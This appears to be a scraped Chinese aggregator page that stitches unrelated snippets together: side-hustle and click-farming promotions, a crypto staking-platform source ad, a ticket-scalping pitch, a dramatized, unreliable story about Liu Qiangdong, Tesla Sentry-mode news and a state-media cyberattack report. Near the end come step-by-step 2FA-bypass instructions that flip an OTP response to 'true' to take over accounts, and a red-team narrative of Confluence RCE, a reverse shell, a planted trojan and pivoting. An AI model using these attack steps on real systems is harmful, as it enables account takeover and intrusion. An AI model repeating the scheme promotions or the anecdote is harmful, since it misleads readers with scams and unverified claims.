如果把我的思想安装到上面捡垃圾吃的那个人的大脑里，这个人第一时间需要做的，就是去找一份体力劳动的工作，工厂上班也可以，先赚到一点钱，租个房子，买台电脑，拉根网线，一边搬砖一边传授别人如何搬砖，赚两份钱，迅速的赚到第一桶金，然后扩大规模，招聘和他一样的闲散人员帮自己搬砖。(哈哈，举个例而已) 04 大多数人都在祈祷上天能给自己根救命稻草，但你们不知道的是，上天一直在给你们救命稻草，但在很多人看来，都不是，都不像，他们认为，只有上天直接撒钱才算，只有他们张口就能直接得到才算，所以在他们看来，生活是越来越没希望，越来越没奔头。 其实当下很多年轻人都活成了这副德行，把机会不当机会，当成陷阱，或者压根就已经分不清是陷阱，还是机会了。如果你还在埋怨你没有钱，你赚不到钱，那么请先想一想，你脑袋里装了快速赚钱的软件了吗?有没有可供马上执行的详细方案?你这颗大脑CPU还能不能调动你这副慵懒的身躯? 躺平很容易，饿死也很简单，但活着最难，父母那个年代那么难，也没有放弃生养我们，他们冒着生命危险去赚钱，来供我们读书识字，教我们为人处世之道，他们不难吗?再难不也扛下来了?而反观现在的年轻人，动不动就不婚主义，丁克家庭，早早的就放弃了生养下一代的责任。你自己活不下去就算了，还不让下一代活，何其可悲。自己不行就多生宝宝吧，把希望留给下一代，万一生个变异宝宝也不一定呢...

寄大大，开一家空中菜鸟驿站，就可以在家拿佣金 开一家空中菜鸟驿站 不用你出房租， 不用你收件， 就可以在家拿佣金。 现在已打通4条管道收益，寄快递，电影票，外卖，网约车 自用省钱，推广赚钱，推广一阵子，躺赚一辈子！ 多邀多得，系统自动奖励，秒提现！ 微信扫码关注吧！！ ...

五语言多币种虚拟币质押投资理财系统源码，定期存币收益理财，加密货币机器人量化交易 五种语言：简体中文+英文+越南语+泰语+繁体中文 ...

项目介绍： 现在大部分人都有追星的心理 ps： 特别是女孩 但是他们又找不到抢票入口，总算找到了她们也抢不到【人太多】，这个时候就需要我们一起去帮抢，简单理解也就是代抢，因为很难抢到所以需要客户联系我们溢价购买 我们同时可以十几个人或者几十上百人帮他去抢一张门票 直击重点： 为什么说了实现了比上班还要赚的多 因为一张门票在成本的基础上会溢价300-500，这就是我们的利润点 ！ 我们需要做的就是在大麦app或者猫眼app上面去操作帮他们抢票 如果你抢到了那么你可以休息好几天了  </div>...

最新手动0撸项目，一天轻松40+，文章阅读，点赞评论，视频号关注等，每天都可以撸。 平台入口：vx扫码 平台共有4种任务可以做 1.文章阅读，每日30篇，单次315积分（0.315元） 2.公众号关注，每日12个，一次30积分 3.视频号点赞，每日30个，一次45积分 4.视频号关注，每日12个，一次45积分 四种任务如上图，单vx每天5＋ 多号多撸 每天小低保 ...

阿里云盘APP最新版->首页“新版本升级答谢礼”->注册多少天就可以领多少GB容量，容量有效期180天。...

2010年，刘强东面临破产危机，无奈之下找到了身价400亿的张磊说：“哥，借我7500万美元好吗?”没想到张磊大手一挥：“7500万太少了，我给你3亿美元，嫌多的话就别找我。” 2010年，刘强东的京东还只是一个初创公司，面临严峻的生存危机。为打开局面，他决定大刀阔斧改造物流系统。但手头资金捉襟见肘，无奈之下，他联系上了师兄张磊，请求借贷7500万美元。 没想到张磊立刻报出一个天文数字：“7500万对你来说太少了，我直接给你3亿美元吧，嫌多就别找我!”刘强东听后惊呆了。他原计划只是小规模试点，没想到张磊如此慷慨大方。刘强东犹豫再三，还是接受了张磊的投资。 获得巨资后，刘强东果断放手一搏，决定建立一个世界一流的全自动智能物流系统。他组建了一个高端技术团队，引进国际顶级自动化设备，与亚马逊的系统不相上下。 然而建设之初并不顺利，准备工作和调试屡屡失败，进度严重滞后。刘强东在张磊面前难堪不已。好在刘强东没有放弃，继续鼓励团队坚持下去。就在刘强东快要绝望时，物流系统在2014年终于建成投用，一举实现了从运输到存储的全自动化管理，效率提升数倍。这直接带动了京东业务量的爆发式增长。在智能物流的加持下，京东成功上市。张磊当初的3亿美元也在上市时暴涨至30多亿美元。刘强东在商场上一战成名。 事业有成的刘强东，在背后默默感激着张磊。没想到就在这时，一桩丑闻突然打断了他商业精英的形象。 有女子实名举报刘强东性侵，并提供了详细证据。曝光后，舆论一时炸开锅。刘强东不得不公开道歉，但声誉已毁。这也让人重新审视了他与妻子章泽天的关系。章泽天比刘强东小上许多，两人的婚姻自始受到非议。有人质疑章泽天是为了钱才嫁给刘强东的。尽管章泽天否认了这种说法，但外界依旧有微词。 爆出丑闻后，舆论纷纷猜测章泽天会选择离婚。没想到章泽天违背了所有预测，选择宽容和支持丈夫。她在社交媒体上晒出工作生活照，似乎已经翻篇。这一反应让很多人刮目相看。章泽天是一个极具智慧的女性，她在感情和事业上都做出了让步和平衡。这对异域夫妻给了人们启发。 刘强东也从这场危机中汲取教训。他时刻警醒自己，保持谦逊谨慎的工作态度。他也再次感激起张磊的恩情，没有张磊的支持，就没有后来的一切。 人生路上，难免起起落落。但只要保持积极心态，坚持前行，终可到达新天地。刘强东和章泽天的故事还未完待续，值得期待他们关系的新发展。 作者：超一线游资的微博...

黑五类是对“无实际功效产品”的代称。比如附带风水属性的手串饰品摆件，难以治愈却承诺有效的各种保健品，课程质量低却夸张宣传成功率的培训，还有更离谱的AI彩票机，手机修复器... 为什么存在? 只要有需求，那就是市场。哪怕需求再离谱，也一样有人付费。营销本质是满足客户认为有价值的需求。并不是你自己认为有用的需求。市场不讲感觉，只认理性规律。所以黑五类本质是在收智商税，情绪税。 拿电商平台来说： 售价16.8元，商家拿货成本在4元，不计运费毛利74%。货源要么找厂家自己发，要么是找供应链自己只负责推广。 第一种模式： 如果自己拿货，最终净利润也就在20%-30%运费，退货率，广告费，人员工资，出评补单成本...也就是卖一单赚5元左右，你算算能卖几单? 第二种模式： 圈内最普遍的都是这种玩法。供应链代发，自己只负责推广，分佣比例在70%左右。但是售价在29.9元-39.9元左右，不如前者好卖。推广渠道一般是快手、拼多多、抖音。结算基本都是次日线下。 去年在秦岭玩的时候，有个小兄弟做的是本命佛挂件。在快手做，从开始的视频带货到无人直播间带货。工作室五个人，400台手机，当时那个月到手15万左右。但平台一直在打压，引流策略和号源一直让人头疼。没镰刀吹的那么容易。 第三种模式： 自己做供应链，这个需要有大量资金、选品能力、优秀的达人。没接触过，不做解读。黑五类这玩意，看似门槛不高，但其实是个大坑。即使你具备强大选品能力，供应链优势，运营技术，那这种品也持续不了多久。你还要持续开发新品，并和平台斗智斗勇。其实电商毛利70%以上的品类不计其数。 高风险 而黑五类面对的不仅是平台的打击，政策的打击，还有同行的折磨。稍有不慎一旦踩到红线，轻者罚款没收所得重者踩缝纫机，典型的高风险，低回报。不论道德而言，仅从法律和平台政策来说都不是一个好生意。 现在的电商平台已经不存在流量红利了。强大选品能力、货源优势、资金优势。没以上任意一种条件千万别碰。当一件赚钱的事被拿出来卖或者免费送就已经是垃圾了。没任何例外。 如果再有人天天在你耳边说：这个黑五类有多赚钱...快来跟我学习吧。趁早拉黑举报。 作者：天智说 公众号：天智说...

简单设置 PC端bai度网盘不限速下载 PS：使用之后会发现一些小问题，下载大文件会有加速，小文件加速不是很明显。 可能还存在更多无法加速的情况！ 1   ...

8月14日，有网友在互联网平台发消息称，湖南岳阳三荷机场的停车场立有『涉密管制区域，禁止特斯拉入内』的警示牌，不允许特斯拉汽车进入，如果特斯拉车主有停车需求，可以把人送过去后，停到机场外十字路口右拐处。随后这一消息在互联网平台引发广泛关注和讨论。 该机场公安接线人员也向媒体证实情况属实，告示已经发布了几个月，解释是“特斯拉车辆带有某种模式，车主离开后会对车身周边环境进行录像”。该工作人员还补充说明，现在很多单位都禁止特斯拉入内，机场员工的特斯拉也不能进入。 此次网友争论的焦点其实也是特斯拉一直存在的问题——不少地区限制特斯拉汽车进入。原因是哨兵模式下的特斯拉会通过前视摄像头、两侧翼子板摄像头和后视摄像头持续监控周围环境，并保存相关视频影像。 出于安全方面的考量，不少重要或涉密地区不允许特斯拉进入。事实上，国外对于特斯拉的特斯拉哨兵模式同样感到担忧。2022年，德国《每日镜报》援引德国柏林警方内部文件报道，柏林警方做出决定，禁止特斯拉汽车进入警局各单位或在警局各单位泊车，原因出在特斯拉汽车摄像头系统身上。 报道称，柏林警方在2022年初发现，特斯拉所有车型都会随时对车辆周边环境进行不间断的视频记录，并将这些记录导出。这些记录长久存储在位于荷兰的服务器上，但车主本人并不知道这些数据是如何被处理的。报道指出，由于特斯拉可以自行决定是否与第三方共享这些信息，警方认为，在这种情况下，也只有执法人员才能确保对个人数据的保护。 特斯拉回应数据泄露 针对此次热搜，特斯拉官方微博发文回应称，哨兵模式是目前主流智能汽车标配的一种智能安全配置，并非特斯拉独有。特斯拉车辆出厂时，该功能默认处于关闭状态，需要车主手动开启才能使用。 在手动启用哨兵模式后，车辆上锁并挂驻车挡时如果检测到附近可能存在损害或者盗窃车辆等威胁时，系统会向车主发出警报，并记录车辆周围的可疑活动，将视频片段保存在已安装的USB设备中为用户带来用车安全保障。目前该功能已协助警方破获了多起车辆损害和失窃案件。与一些品牌可以通过哨兵模式远程查看车辆周围环境不同，目前特斯拉车辆的这些数据只离线存储在车内USB设备中，车主和特斯拉均不能远程在线查看。 另外，特斯拉公司已在中国建立数据中心，以实现数据存储的本地化。所有在中国大陆市场销售车辆所产生的数据，都会存储在中国境内。2021年10月政府主管部门联合发布《汽车数据安全管理若T规定 (试行)》后，特斯拉公司作为首批试点企业，积极参与了主管部门组织的合规试点工作。 哨兵模式争议不断 在特斯拉的官网，目前有队哨兵模式进行解释，并指出“为保护用户的隐私，哨兵模式录像不会传输给特斯拉。对于 2018 年及之后生产的车型（软件版本为 2020.48.5 或更高版本），录像将保存到车载存储器，可以通过车辆的触摸屏直接查看。” 截止到目前，业界对于哨兵模式争议存在已久。据媒体报道，2023年2月荷兰数据保护局（dpa）发出声明称，消费者需要为使用特斯拉“哨兵模式”造成的隐私侵权负全责。 由此可见，哨兵模式的争议在于采集的数据是否安全。特斯拉之所以被禁止入内，很大原因是担忧这些环境数据会被悄悄上传至美国，大量泄露我国机密地区的信息；其次是汽车是否有权利随意采集环境数据？一旦开启哨兵模式，无论数据存储在厂商还是车主的USB中，哨兵模式将会持续收集汽车周围的信息，其中不乏个人隐私方面信息。 也许车主不会主动泄露这些信息，但在数据采集过程中并没有征集路人的同意，这是否涉及侵犯了用户的隐私呢？ ...

武汉地震监测中心被网攻“幕后黑手”已锁定，美国神秘侦察系统即将被曝光 《环球时报》记者14日获悉，针对武汉市应急管理局地震监测中心的网络攻击事件，国家计算机病毒应急处理中心和360公司组成的联合调查组已取得新进展，发现了符合美国情报机构特征的后门恶意软件。下一步有关机构将向外界公开披露美国政府一直处于高度保密的某全球侦察系统，其对我国和世界各国国家安全和世界的和平安全都构成严重安全威胁。 7月26日，武汉市应急管理局地震监测中心报警称，该中心发现部分地震速报数据前端台站采集点网络设备被植入后门程序，此事引起外界广泛关注。国家计算机病毒应急处理中心和360公司随即组成联合调查组赴武汉调查取证。国家计算机病毒应急处理中心高级工程师杜振华对《环球时报》记者表示，目前，联合调查组已经在受害单位的网络中发现了技术非常复杂的后门恶意软件，符合美国情报机构特征，具有很强的隐蔽性，并且通过恶意软件的功能和受影响的系统判断，攻击者的目的是窃取地震监测相关数据，而且具有明显的军事侦察目的。 杜振华 图源：环球时报-环球网 美国情报机构为什么锁定地震监测系统？ 地震之后，各国相关机构会对外公布发布震源位置、震级、深度等相关数据，作为一项民用基础设施，地震监测系统为什么会成为美国情报机构军事侦察的目标呢？杜振华介绍，我国是遭受地震灾害最为严重的国家之一，多次发生造成严重人员和财产损失的地震灾害。“因此我国高度重视地震监测和地震预警工作，为了提高地质灾害的监测预警能力，地震监测数据并不限于震级震源等基本信息，还包括地表变形监测数据、水文监测数据等丰富的地理地质数据；这些数据同时也是具有很高价值的军事情报数据。因此，美国情报机构对地震监测中心的网络攻击是一次有计划有预谋的网络军事侦察行动。” 全国政协委员，安天集团董事长、首席技术架构师肖新光接受《环球时报》记者采访时进一步解释说，震源位置、震级、深度虽然是公开发布的信息，但这是基于多传感器的一个感知计算结果，“这些传感器所感知采集的综合震动声波数据，尤其是次声波数据，对研判地质地形、分析武器系统试验、核试验等均有重要情报价值。” 而且这只是美将网络目标对准地震监测等系统的原因之一，肖新光还分析说，当前这部分信息获取只是相关行为体已被曝光出来的行为活动，还有很多针对其他领域的信息窃取尚未浮出水面。凭借其本身对全球的综合探测能力，加之多方位的入侵窃取和其它综合手段运用，获取我方各种各类遥测数据，再综合其他多源辅助数据，就形成了对我方经济社会运行甚至军事行动的分析、研判、归因、定位等能力。 若攻击者篡改地震监测数据触发误报警，或导致社会恐慌 专家们认为，针对包括地震监测系统在内的民用基础设施遭受到网络攻击也一样会导致非常严重的后果。 杜振华举例说，如果此次攻击者对地震监测系统进行了恶意破坏，当地震发生时，系统就无法有效提供准确数据，影响地震预警和灾害评估工作，进而导致更加严重的人员财产损失，“更加危险的是，如果攻击者篡改地震监测数据，触发误报警，可能导致社会恐慌和秩序混乱，造成无辜群众伤亡。” 肖新光也表示，遥感遥测体系和数据是必须重点保护的国家战略资源。这些数据能从宏观到微观展示我国经济社会的基本运行，是综合决策、应急响应的综合支撑，是国土安全和国家安全的支撑资源。” 肖新光 图源：环球时报-环球网 “美方情报机构不仅针对各种信号情报进行主动采集，也长期以来通过多种方式获取他国地形、地质、地球物理、气象、水文等综合地球系统科学遥感遥测数据作为战略情报，获取手段包括通过盟友情报机制共享，胁迫高科技公司提供，以及利用学术、科研活动套取等。”肖新光表示，此次武汉监测站事件的发现不是偶然的，由此可以判断，网络攻击入侵窃取已成为美方获取他国遥感遥测数据的最低成本途径。美方建设了一系列信号情报采集分析处理系统，如针对电磁信号监听获取的“梯队”项目、针对电信运营商的“主干道”项目、针对美大型IT和互联网厂商的超级访问接口“棱镜”项目等。 肖新光还透露，“我们会同有关部门经过多年持续跟踪，近期将对美国政府的某全球侦察系统进行公开披露，它对我国和世界各国的国家安全和世界的和平安全都构成了严重安全威胁，对此，必须高度警惕、严密防范。” 美对民用设施发动网络攻击违反国际法 事实上，在“棱镜门”、“影子经纪人”和“维基解密”等事件中曝光的美国国家安全局（NSA）、中央情报局（CIA）大量内部文件表明，美国作为名副其实的“黑客帝国”“窃密帝国”，其网络情报收集活动的目标是“无差别”的（包括其盟友），全球范围内的民事机构和个人都是其网络攻击的对象，充分暴露了美国在人权问题上的双重标准和虚伪面孔。 杜振华进一步表示，美国军事情报机构利用自身信息技术优势针对民用基础设施发动网络攻击是明显违反国际法的犯罪行为，严重侵害了我国国家安全和社会公共利益。“事实上，长期以来，美国对我国关键信息基础设施的网络攻击是全方位的，政府机构、高校、科研单位、大型企业都是其网络间谍活动的目标。美国妄图通过这种不正当的手段，全面窃取我国政治、经济、军事、外交等敏感情报，以遏制我国的发展进步，维持美国的世界霸权。” 长期从事计算机病毒防治技术研究工作和应急处置工作的专家杜振华建议，一旦我国关键信息基础设施遭受到有国家背景的网络攻击，相关单位必须第一时间向主管部门报告遭网络攻击情况；严格依据《网络关键设备和网络安全专用产品目录》开展网络安全能力建设；加强供应链安全管理，提高自主可控能力；定期开展网络安全演练，提高应急处置和恢复能力。 肖新光认为，中国网络安全整体产业体系虽然目前市场规模依然较小，但整体上从加密认证、威胁检测防护、系统防护、流量安全等基础能力频谱上来看，技术门类齐全，没有明显短板，“在与威胁的持续对抗，特别是发现、分析、曝光包括美方在内的高级持续性网络攻击方面，中国多家优秀的网络安全企业已经展示了自身的能力，成为了保障国家安全、捍卫网络空间命运共同体安全的产业支撑力量。” 他还表示，在网络安全能力上中国没有必要妄自菲薄，我们可以建立更具备进取性的目标，成为国家治理体系中的能力长板，成为相较于主要地缘竞合方的能力优势，在应对霸权国家综合打压，甚至面临高烈度安全冲突过程中不会成为重大制约和风险软肋，“我们可以通过强化网络安全的公共服务属性建设，通过加强对共性安全能力、弹性机制和网络安全基础设施的建设，达成网络安全风险整体基本可控、增量收敛的目标状态。” 此前报道：武汉地震监测中心遭网络攻击！黑手疑来自美国 来源：环球时报-环球网特约记者 袁宏 ～!    ↓ ...

概括 在编辑用户详细信息（包括姓名、电子邮件或电话号码）时，付款应用程序需要通过您的电话号码和电子邮件进行 2FA 验证。我发现了一个简单的绕过实施的 2FA 流程的方法，攻击者可以通过该方法编辑用户详细信息，而无需手机/电子邮件访问权限，最终导致帐户被接管。 复现步骤 1.转到编辑部分，开始编辑电子邮件字段。 2.2FA 提示将要求您提供当前电子邮件的 OTP。 3.输入错误的一次性密码“123456”。拦截响应。 4.将响应从 {"success":"false"} 更改为 {"success":"true"} 。 5.2FA 提示将再次要求您提供当前电话号码的 OTP。 6.输入错误的一次性密码“123456”。拦截响应。 7.将响应从 {"success":"false"} 更改为 {"success":"true"} 。 8.提示会要求您输入要更改的电子邮件，在此输入攻击者电子邮件。 9.输入电子邮件收件箱中的 OTP。 10.刷新仪表板，电子邮件已更改。 漏洞为什么会发生 通常，在 2FA 验证（第一个 HTTP 请求）之后，会分配一个令牌，并且该令牌将用于电子邮件更改请求（第二个 HTTP 请求）。在这里，输入 OTP 时（在第一个 HTTP 响应中）没有发送此类令牌。这是多阶段操作时检查的常见情况。 漏洞报告时间线 2023 年 5 月 10 日 - 通过 Hackerone 报道 2023 年 5 月 11 日 - 状态更改为“已分类” 2023 年 6 月 7 日 - 重新测试完成 50 美元并解决 2023 年 6 月 10 日 - 5000 美元奖励 + 500 美元奖金    ...

0x00 前言 本文介绍了笔者在某次攻防演练中，如何从外网渗透到某车企的内网的详细过程（为了保护敏感信息，所有数据都已经脱敏，有些截图也不完整，请见谅）。 这次网络攻防演练分为两个阶段一共十四天，前七天是私有资源阶段，后七天是公共资源池阶段。共有12支队伍参与比赛，我们公司全程只有两名选手参赛。由于公司从不提供一些辅助工具和人力资源，并且我俩近期连续参加了多场比赛，导致每次比赛后我俩都很内耗。 0x01 信息收集 裁判只给出了目标企业的名称，让我们自行寻找其他的信息，这是对我们资源差的队伍是一种考验。 幸运的是，笔者之前编写了一套信息收集的辅助脚本，现在可以派上大用场了。 首先，使用子公司收集脚本来搜索一级子公司。该脚本根据特定的条件和规则进行搜索，以获取与一级公司有50%的控股关系的子公司。然后，我们对这些一级子公司再次使用脚本进行搜索，以找到与它们有50%的控股关系的子公司。这个过程不断循环，直到没有符合条件的子公司为止，所以你看到下面最深达到了四级公司。 接下来，再用资产收集脚本对子公司收集脚本的ICP结果进行一系列的操作，该脚本包括子域名匹配、端口扫描、web路径搜索、服务识别等，最终结果会到了以下三个文件，其中ip文件可以交给灯塔去进行信息收集、url文件可以交给poc扫描器、详情文件可以在扫描poc的时候手工去寻找一些POC扫描器里面没有的漏洞（如弱口令，手动狗头）。 0x02 web打点 我先用poc扫描器（xray青春版，poc-bomber等开源作品）对资产收集的结果进行了一番扫描，结果没有发现一个可利用漏洞（人少公司也不提供些打点资源，怎么搞嘛，狗头保命）。没办法，只能老老实实手动地一个个分析哪些URL可能有惊喜了。在翻了一大堆无聊的页面后，我目光锁定在了一个url上，这url的title是XXConfluence当发现这个网站使用的是Confluence时，我想很多师傅们都知道该怎么做了。我立刻检测它是否存在RCE，经过一番尝试后，发现这个版本确实存在RCE，并且确认了服务器的操作系统是Linux。 接下来就把shell反弹到服务器上，发现已经拿到了无限制的shell访问权限。马上做了一个远程控制马并上传到目标服务器。MSF上线后我就查了一下网卡，发现这个服务器有个172.32.0.30的网卡，接着上传代理工具。 ...